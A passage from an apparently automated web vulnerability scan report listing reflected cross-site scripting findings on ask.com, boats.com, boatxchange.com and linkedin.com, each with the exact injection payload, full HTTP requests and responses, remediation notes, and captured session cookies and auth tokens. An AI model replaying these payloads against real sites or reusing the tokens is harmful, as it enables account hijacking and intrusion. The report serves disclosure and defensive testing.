Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:52 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:52 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'regulator boatef4cb\\';4d01c24067b';
google_kw = 'regulator boatef4cb\\';4d01c24067b';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute(
...[SNIP]...

3.76. http://www.ask.com/pictureslanding [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a2ff'%3balert(1)//060dbcc8357 was submitted in the l parameter. This input was echoed as 2a2ff';alert(1)//060dbcc8357 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding?o=0&l=dir2a2ff'%3balert(1)//060dbcc8357 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir2a2ff';alert(1)//060dbcc8357"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir2a2ff%27%3Balert%281%29%2F%2F060dbcc8357; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Content-Length: 58641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=A85CEC08BA14E9370EACEFB56AB8D916&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir2a2ff';alert(1)//060dbcc8357';


_matchUrl+= "&userip=173.193.214.243";


_matchUrl+= "&wzinfo=no";



...[SNIP]...

3.77. http://www.ask.com/web [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1c7\'%3bfb820ccc7e7 was submitted in the q parameter. This input was echoed as 8c1c7\\';fb820ccc7e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /web?q=Is+there+lead+in+reusable+grocery+bags%3F8c1c7\'%3bfb820ccc7e7&gc=1&qsrc=3066&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: clc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:14:33 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155673227; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:14:33 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-SXMrdGhlcmUrbGVhZCtpbityZXVzYWJsZStncm9jZXJ5K2JhZ3MlM0Y4YzFjNyU1QyUyNyUzQmZiODIwY2NjN2U3; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjMzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:33 GMT; Path=/
Content-Length: 78834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - Wha
...[SNIP]...
e = 'medium';
google_adtest = 'off';

google_ad_section = 'default';

google_page_url = '';


google_hints = 'Is there lead in reusable grocery bags?8c1c7\\';fb820ccc7e7';
google_kw = '';


google_kw_type = 'broad';

}else{

google_ad_client = 'aj-cat';
google_ad_channel = 'hobbies_and_activities-craft
...[SNIP]...

3.78. http://www.ask.com/web [qid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0073'%3balert(1)//d6de0c6a20 was submitted in the qid parameter. This input was echoed as f0073';alert(1)//d6de0c6a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=regulator+boat&qsrc=0&frstpgo=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14Af0073'%3balert(1)//d6de0c6a20&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:59 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - Wha
...[SNIP]...
<script type="text/javascript">
var _psBack = '&#171;&#160;Prev';
var _psForward = 'Next&#160;&#187;';
var _psQueryID = '98661B091CD7946B37C24EBBC344D14Af0073';alert(1)//d6de0c6a20';
var _psQuerySource = '0';
var _psSiteID = '';
</script>
...[SNIP]...

3.79. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boats.com
Path:   /boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0f7"><script>alert(1)</script>73e292f6ad1 was submitted in the yw_country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US6e0f7"><script>alert(1)</script>73e292f6ad1 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761473052; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=bcKRwwsrrCjc; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=693|Accelerated|109|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123D92E17E5C;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<a href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=us6e0f7"><script>alert(1)</script>73e292f6ad1">
...[SNIP]...

3.80. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boats.com
Path:   /boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d06'%3balert(1)//ec734b2bd35 was submitted in the yw_country parameter. This input was echoed as 33d06';alert(1)//ec734b2bd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(1)//ec734b2bd35 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761823561; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=abnezuav6TX4; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=599|Accelerated|669|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123DC2FB55B2;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/us33d06';alert(1)//ec734b2bd35/transport.html';
OAS_listpos = 'Right1,Top1';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String
...[SNIP]...

3.81. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff2dc<script>alert(1)</script>051e6b7c2ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=0738E8BB69B4576E7DFEB8F02B3A22A5.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearc
...[SNIP]...

3.82. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 631f9<script>alert(1)</script>38d066a2dec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=70B1F81A76B600538F4CCDD338B20EB4.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandCo
...[SNIP]...

3.83. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ef1d6<script>alert(1)</script>dbd5bb8b76 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76 HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=EE13D5B4D07CE6426B8A05BBA4EAD214.tomcat1; Path=/pboats
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 18869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandController.jav
...[SNIP]...

3.84. https://www.linkedin.com/secure/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47a6'-alert(1)-'f2583992d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /secureb47a6'-alert(1)-'f2583992d5c/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a42198c; bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; JSESSIONID="ajax:2350077440714366421"; leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296155990:5ed64d4d5f57e19d1092d1eaf1f4a8bd26dd7b76"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Z8AO-20Khh1K0OWjw5zaBBzxLBaEbMVjxTAWV7kKsG1Zr1YspMYdVT:1296157810:2b1512b33861e588d824862ae46734c91e6073f9"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:20:09 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 990
